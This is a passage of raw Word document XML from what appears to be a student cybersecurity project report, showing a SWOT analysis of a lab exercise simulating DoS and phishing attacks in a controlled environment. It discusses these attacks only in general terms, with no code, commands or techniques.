      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>underline</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>critical need for continuous security education and vigilance in today's digital age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A362E16" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00034D15">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B92C9B3" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="429" w:right="69"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>SWOT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3950AB59" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Strengths:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CA4E92" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="1"/>
        <w:ind w:right="287"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Practical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Demonstration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>project</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>provided</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>hands-on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>experience</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>understanding and executing DoS and phishing attacks in a controlled environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A351DB0" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="615"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Learning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Opportunity</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Gained</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>valuable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>working</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cyberattacks, which can be applied to strengthen defenses against such threats.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C0E34B" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="372"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Awareness</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Building</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Highlighted</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>risks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>associated</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system overload (DoS) and user trust exploitation (phishing).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDCA5EA" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="354"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Ethical</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Hacking</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Practices</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>attacks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>performed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ethically</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>focus</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>on learning, ensuring no real harm was caused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D5CA8A" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Weaknesses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7E361" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="367"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Limited</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Real-World</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Simulations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>single</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>machine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>controlled environment may not fully replicate the complexities of real-world scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726AD282" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="615"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Beginner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-11"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Challenges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>As</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>beginner,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>some</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>concepts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tools</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>may</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>remain unexplored, limiting the depth of the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071AB001" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="563"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Resource</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Constraints</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>high-end</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resources,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>and phishing simulations was restricted to basic setups.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25DEC3B2" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Opportunities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E065961" w14:textId="77777777" w:rsidR="00034D15" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:right="15"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
